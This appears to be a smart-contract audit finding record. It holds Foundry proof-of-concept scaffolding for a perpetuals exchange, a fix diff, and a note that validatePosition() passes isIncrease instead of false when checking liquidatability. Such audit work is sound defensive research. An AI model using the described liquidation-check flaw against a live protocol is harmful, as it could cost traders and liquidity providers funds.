compactedMaxOracleBlockNumbers[0] << 64 | block.number+5;\\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5; \\n compactedMaxOracleBlockNumbers[0] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5; \\n\\n compactedMaxOracleBlockNumbers[1] = block.number+5; \\n compactedMaxOracleBlockNumbers[1] = compactedMaxOracleBlockNumbers[0] << 64 | block.number+5;\\n\\n // must be equal to the number of tokens 6, 64 for each one, so 64*6. 64*4 for one element, so need two elements \\n uint256[] memory compactedOracleTimestamps = new uint256[](2);\\n compactedOracleTimestamps[0] = 9;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 8;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 7;\\n compactedOracleTimestamps[0] = compactedOracleTimestamps[0] << 64 | 7;\\n \\n compactedOracleTimestamps[1] = 9;\\n compactedOracleTimestamps[1] = compactedOracleTimestamps[0] << 64 | 8;\\n \\n\\n // must be equal to the number of tokens, 8 for each, so 8*6= 48, only need one element\\n uint256[] memory compactedDecimals = new uint256[](1);\\n compactedDecimals[0] = 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n compactedDecimals[0] = compactedDecimals[0] << 8 | 12;\\n \\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 32 bits, so each 8 entries takes one element, we need 3 elements\\n // price table:\\n // SOL: 100 101 102\\n // wnt: 200 201 203\\n // USDC 1 1 1\\n // tokenA 100 101 102\\n // tokenB 200 202 204\\n // tokenC 400 404 408\\n\\n uint256[] memory compactedMinPrices = new uint256[](3);\\n compactedMinPrices[2] = 408; \\n compactedMinPrices[2] = compactedMinPrices[2] << 32 | 404;\\n\\n compactedMinPrices[1] = 400;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 204;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 202;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 200;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 102;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 101;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 100;\\n compactedMinPrices[1] = compactedMinPrices[1] << 32 | 1;\\n \\n compactedMinPrices[0] = 1;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 1;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 203;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 201;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 200;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 102;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 101;\\n compactedMinPrices[0] = compactedMinPrices[0] << 32 | 100;\\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 8 bits, so we just need one element\\n\\n uint256[] memory compactedMinPricesIndexes = new uint256[](1);\\n compactedMinPricesIndexes[0] = 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 1;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 2;\\n compactedMinPricesIndexes[0] = compactedMinPricesIndexes[0] << 8 | 0; \\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 32 bits, so each 8 entries takes one element, we need 3 elements\\n // price table:\\n // SOL: 105 106 107\\n // wnt: 205 206 208\\n // USDC 1 1 1\\n // tokenA 105 106 107\\n // tokenB 205 207 209\\n // tokenC 405 409 413\\n uint256[] memory compactedMaxPrices = new uint256[](3);\\n compactedMaxPrices[2] = 413;\\n compactedMaxPrices[2] = compactedMaxPrices[2] << 32 | 409;\\n \\n compactedMaxPrices[1] = 405;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 209;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 207;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 205;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 107;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 106;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 105;\\n compactedMaxPrices[1] = compactedMaxPrices[1] << 32 | 1;\\n\\n compactedMaxPrices[0] = 1;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 1;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 208;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 206; \\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 205; \\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 107;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 106;\\n compactedMaxPrices[0] = compactedMaxPrices[0] << 32 | 105;\\n \\n \\n // three signers, 6 tokens, so we have 3*6 = 18 entries, each entry takes 8 bits, so we just need one element\\n\\n uint256[] memory compactedMaxPricesIndexes = new uint256[](1);\\n compactedMaxPricesIndexes[0] = 1; \\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 1;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 2;\\n compactedMaxPricesIndexes[0] = compactedMaxPricesIndexes[0] << 8 | 0;\\n \\n // 3 signers and 6 tokens, so we need 3*6 signatures\\n bytes[] memory signatures = new bytes[](18);\\n for(uint i; i<18; i++){\\n signatures[i] = abi.encode(\"SIGNATURE\");\\n }\\n address[] memory priceFeedTokens;\\n\\n OracleUtils.SetPricesParams memory priceParams = OracleUtils.SetPricesParams(\\n signerInfo,\\n tokens,\\n compactedMinOracleBlockNumbers,\\n compactedMaxOracleBlockNumbers,\\n compactedOracleTimestamps,\\n compactedDecimals,\\n compactedMinPrices, \\n compactedMinPricesIndexes,\\n compactedMaxPrices, \\n compactedMaxPricesIndexes, \\n signatures, \\n priceFeedTokens\\n );\\n return priceParams;\\n}\\n\\n/* \\n* The current index token price (85, 90), a trader sets a trigger price to 100 and then acceptabiel price to 95.\\n* He like to long the index token. \\n* 1. Pick the primary price 90 since we long, so choose the max\\n* 2. Make sure 90 < 100, and pick (90, 100) as the custom price since we long\\n* 3. Choose price 95 since 95 is within the range, and it is the highest acceptible price. Choosing 90 \\n* will be in favor of the trader\\n* \\n*/\\n\\nfunction createMarketSwapOrder(address account, address inputToken, uint256 inAmount) public returns(bytes32)\\n{ \\n address[] memory swapPath = new address[](1);\\n swapPath[0] = _marketProps1.marketToken;\\n // swapPath[0] = _marketPropsAB.marketToken;\\n // swapPath[1] = _marketPropsBC.marketToken;\\n // swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account; // the account is the receiver\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = account; // set myself as the ui receiver\\n // params.addresses.market = marketToken;\\n params.addresses.initialCollateralToken = inputToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n // params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n params.numbers.initialCollateralDeltaAmount = inAmount ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(inputToken).transfer(address(_orderVault), inAmount); // this is the real amount\\n\\n\\n // params.numbers.triggerPrice = triggerPrice;\\n // params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n // params.numbers.initialCollateralDeltaAmount = inAmount;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketSwap;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n // params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n}\\n\\n\\n\\nfunction createLiquidationOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.Liquidation;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createStopLossDecrease(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.StopLossDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createLimitDecreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, uint256 acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.LimitDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\nfunction createLimitIncreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint triggerPrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = triggerPrice; // used for limit order\\n params.numbers.acceptablePrice = 121000000000000; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.LimitIncrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\n\\nfunction createMarketDecreaseOrder(address account, address marketToken, address collateralToken, uint256 acceptablePrice, uint256 sizeInUsd, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeInUsd; // how much dollar to decrease, will convert into amt of tokens to decrease in long/short based on the execution price\\n params.numbers.initialCollateralDeltaAmount = 13e18; // this is actually useless, will be overidden by real transfer amount\\n // vm.prank(account); \\n // IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = 0;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 10e18; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketDecrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createMarketIncreaseOrder(address account, address marketToken, address collateralToken, uint256 collateralAmount, uint sizeDeltaUsd, uint acceptablePrice, bool isLong) public returns(bytes32)\\n{\\n address[] memory swapPath;\\n \\n //address[] memory swapPath = new address[](3);\\n //swapPath[0] = _marketPropsAB.marketToken;\\n //swapPath[1] = _marketPropsBC.marketToken;\\n //swapPath[2] = _marketPropsCwnt.marketToken;\\n\\n \\n vm.prank(account); \\n _wnt.transfer(address(_orderVault), 3200); // execution fee\\n\\n\\n BaseOrderUtils.CreateOrderParams memory params;\\n params.addresses.receiver = account;\\n params.addresses.callbackContract = address(0);\\n params.addresses.uiFeeReceiver = uiFeeReceiver;\\n params.addresses.market = marketToken; // final market\\n params.addresses.initialCollateralToken = collateralToken; // initial token\\n params.addresses.swapPath = swapPath;\\n\\n params.numbers.sizeDeltaUsd = sizeDeltaUsd;\\n // params.numbers.initialCollateralDeltaAmount = ; // this is actually useless, will be overidden by real transfer amount\\n vm.prank(account); \\n IERC20(collateralToken).transfer(address(_orderVault), collateralAmount); // this is the real amount\\n\\n\\n params.numbers.triggerPrice = 0;\\n params.numbers.acceptablePrice = acceptablePrice; // I can buy with this price or lower effective spread control \\n params.numbers.executionFee = 3200;\\n params.numbers.callbackGasLimit = 3200;\\n params.numbers.minOutputAmount = 100; // use the control the final collateral amount, not for the position size delta, which is indirectly controlled by acceptable price\\n\\n params.orderType = Order.OrderType.MarketIncrease;\\n params.decreasePositionSwapType = Order.DecreasePositionSwapType.NoSwap;\\n params.isLong = isLong;\\n params.shouldUnwrapNativeToken = false;\\n params.referralCode = keccak256(abi.encode(\"MY REFERRAL\"));\\n\\n vm.prank(account);\\n bytes32 key = _erouter.createOrder(params);\\n return key;\\n} \\n\\n\\n\\nfunction createWithdraw(address withdrawor, uint marketTokenAmount) public returns (bytes32)\\n{\\n address[] memory longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n console.log(\"createWithdraw with withdrawor: \");\\n console.logAddress(withdrawor);\\n vm.prank(withdrawor); \\n _wnt.transfer(address(_withdrawalVault), 3200); // execution fee\\n\\n vm.prank(withdrawor);\\n ERC20(_marketProps1.marketToken).transfer(address(_withdrawalVault), marketTokenAmount);\\n\\n WithdrawalUtils.CreateWithdrawalParams memory params = WithdrawalUtils.CreateWithdrawalParams(\\n withdrawor, // receiver\\n address(0), // call back function\\n uiFeeReceiver, // uiFeeReceiver\\n _marketProps1.marketToken, // which market token to withdraw\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 123, // minLongTokenAmount\\n 134, // minShortTokenAmount\\n false, // shouldUnwrapNativeToken\\n 3200, // execution fee\\n 3200 // callback gas limit\\n );\\n\\n vm.prank(withdrawor);\\n bytes32 key = _erouter.createWithdrawal(params);\\n return key;\\n}\\n\\n\\nfunction createDepositNoSwap(Market.Props memory marketProps, address depositor, uint amount, bool isLong) public returns (bytes32){\\n address[] memory longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n console.log(\"createDeposit with depositor: \");\\n console.logAddress(depositor);\\n\\n vm.prank(depositor);\\n _wnt.transfer(address(_depositVault), 3200); // execution fee\\n if(isLong){\\n console2.log(\"000000000000000000\");\\n vm.prank(depositor);\\n IERC20(marketProps.longToken).transfer(address(_depositVault), amount); \\n console2.log(\"bbbbbbbbbbbbbbbbbbbbbb\");\\n }\\n else {\\n console2.log(\"111111111111111111111111\");\\n console2.log(\"deposit balance: %d, %d\", IERC20(marketProps.shortToken).balanceOf(depositor), amount);\\n vm.prank(depositor);\\n IERC20(marketProps.shortToken).transfer(address(_depositVault), amount);\\n console2.log(\"qqqqqqqqqqqqqqqqqq\");\\n }\\n \\n\\n DepositUtils.CreateDepositParams memory params = DepositUtils.CreateDepositParams(\\n depositor,\\n address(0),\\n uiFeeReceiver,\\n marketProps.marketToken,\\n marketProps.longToken,\\n marketProps.shortToken,\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 100000, // minMarketTokens\\n true,\\n 3200, // execution fee\\n 3200 // call back gas limit\\n );\\n\\n console2.log(\"aaaaaaaaaaaaaaaaaaaaaaaaa\");\\n vm.prank(depositor);\\n bytes32 key1 = _erouter.createDeposit(params);\\n\\n return key1;\\n}\\n\\n/*\\nfunction testCancelDeposit() public \\n{\\n address[] memory longTokenSwapPath;\\n address[] memory shortTokenSwapPath;\\n\\n address(_wnt).call{value: 100e8}(\"\");\\n _wnt.transfer(address(_depositVault), 1e6);\\n DepositUtils.CreateDepositParams memory params = DepositUtils.CreateDepositParams(\\n msg.sender,\\n address(0),\\n address(111),\\n _marketProps1.marketToken,\\n _marketProps1.longToken,\\n _marketProps1.shortToken,\\n longTokenSwapPath,\\n shortTokenSwapPath,\\n 100000, // minMarketTokens\\n true,\\n 3200, // execution fee\\n 3200 // call back gas limit\\n );\\n\\n bytes32 key1 = _erouter.createDeposit(params);\\n\\n console.log(\"WNT balance of address(222) before cancelllation: %s\", _wnt.balanceOf(address(222)));\\n console.log(\"WNT balance of address(this) before cancelllation: %s\", _wnt.balanceOf(address(this))); \\n\\n _roleStore.grantRole(address(222), Role.CONTROLLER); // to save a market's props\\n vm.prank(address(222));\\n _depositHandler.cancelDeposit(key1);\\n console.log(\"WNT balance of address(222) after cancelllation: %s\", _wnt.balanceOf(address(222)));\\n console.log(\"WNT balance of address(this) after cancelllation: %s\", _wnt.balanceOf(address(this))); \\n}\\n*/\\n\\nfunction testERC165() public{\\n bool yes = _wnt.supportsInterface(type(IWNT).interfaceId);\\n console2.log(\"wnt suppports deposit?\");\\n console2.logBool(yes);\\n vm.expectRevert();\\n yes = IERC165(address(_sol)).supportsInterface(type(IWNT).interfaceId);\\n console2.logBool(yes);\\n\\n if(ERC165Checker.supportsERC165(address(_wnt))){\\n console2.log(\"_wnt supports ERC165\");\\n }\\n if(ERC165Checker.supportsERC165(address(_sol))){\\n console2.log(\"_sol supports ERC165\");\\n }\\n}\\n\\n function justError() external {\\n // revert Unauthorized(\"abcdefg\"); // 973d02cb\\n // revert(\"abcdefg\"); // 0x08c379a, Error selector\\n // require(false, \"abcdefg\"); // 0x08ce79a, Error selector\\n assert(3 == 4); // Panic: 0x4e487b71\\n }\\n\\n function testErrorMessage() public{\\n\\n try this.justError(){} \\n catch (bytes memory reasonBytes) {\\n (string memory msg, bool ok ) = ErrorUtils.getRevertMessage(reasonBytes);\\n console2.log(\"Error Message: \"); console2.logString(msg);\\n console2.log(\"error?\"); console2.logBool(ok);\\n } \\n }\\n\\n \\n function printAddresses() public{\\n console2.log(\"_orderVault:\"); console2.logAddress(address(_orderVault));\\n console2.log(\"marketToken:\"); console2.logAddress(address(_marketProps1.marketToken));\\n } \\n\\n function printPoolsAmounts() public{\\n console2.log(\"\\n The summary of pool amounts: \");\\n \\n uint256 amount = MarketUtils.getPoolAmount(_dataStore, _marketProps1, _marketProps1.longToken);\\n console2.log(\"Market: _marketProps1, token: long/nwt, amount: %d\", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketProps1, _marketProps1.shortToken);\\n console2.log(\"Market: _marketProps1, token: short/USDC, amount: %d\", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsAB, _marketPropsAB.longToken);\\n console2.log(\"Market: _marketPropsAB, token: long/A, amount: %d\", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsAB, _marketPropsAB.shortToken);\\n console2.log(\"Market: _marketPropsAB, token: short/B, amount: %d\", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsBC, _marketPropsBC.longToken);\\n console2.log(\"Market: _marketPropsBC, token: long/B, amount:%d\", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsBC, _marketPropsBC.shortToken);\\n console2.log(\"Market: _marketPropsBC, token: short/C, amount: %d\", amount);\\n \\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsCwnt, _marketPropsCwnt.longToken);\\n console2.log(\"Market: _marketPropsCwnt, token: long/C, amount: %d\", amount);\\n amount = MarketUtils.getPoolAmount(_dataStore, _marketPropsCwnt, _marketPropsCwnt.shortToken);\\n console2.log(\"Market: _marketPropsCwnt, token: short/wnt, amount: %d\", amount);\\n \\n\\n console2.log(\"\\n\");\\n }\\n \\n}\\n```\\nчPass false always to isPositionLiquidatable():\\n```\\n function validatePosition(\\n DataStore dataStore,\\n IReferralStorage referralStorage,\\n Position.Props memory position,\\n Market.Props memory market,\\n MarketUtils.MarketPrices memory prices,\\n bool isIncrease,\\n bool shouldValidateMinPositionSize,\\n bool shouldValidateMinCollateralUsd\\n ) public view {\\n if (position.sizeInUsd() == 0 || position.sizeInTokens() == 0) {\\n revert Errors.InvalidPositionSizeValues(position.sizeInUsd(), position.sizeInTokens());\\n }\\n\\n MarketUtils.validateEnabledMarket(dataStore, market.marketToken);\\n MarketUtils.validateMarketCollateralToken(market, position.collateralToken());\\n\\n if (shouldValidateMinPositionSize) {\\n uint256 minPositionSizeUsd = dataStore.getUint(Keys.MIN_POSITION_SIZE_USD);\\n if (position.sizeInUsd() < minPositionSizeUsd) {\\n revert Errors.MinPositionSize(position.sizeInUsd(), minPositionSizeUsd);\\n }\\n }\\n\\n if (isPositionLiquidatable(\\n dataStore,\\n referralStorage,\\n position,\\n market,\\n prices,\\n// Remove the line below\\n isIncrease,\\n// Add the line below\\n false,\\n shouldValidateMinCollateralUsd\\n )) {\\n revert Errors.LiquidatablePosition();\\n }\\n }\\n```\\nчPositionUtils.validatePosition() uses `isIncrease` instead of `false` when calling isPositionLiquidatable(), making it not work properly for the case of `isIncrease` = true. A liquidation should always be considered as a decrease order in terms of evaluating price impact.ч```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport \"forge-std/Test.sol\";\\nimport \"../contracts/role/RoleStore.sol\";\\nimport \"../contracts/router/ExchangeRouter.sol\";\\nimport \"../contracts/data/DataStore.sol\";\\nimport \"../contracts/referral/ReferralStorage.sol\";\\n\\nimport \"../contracts/token/IWNT.sol\";\\nimport \"../contracts/token/WNT.sol\";\\nimport 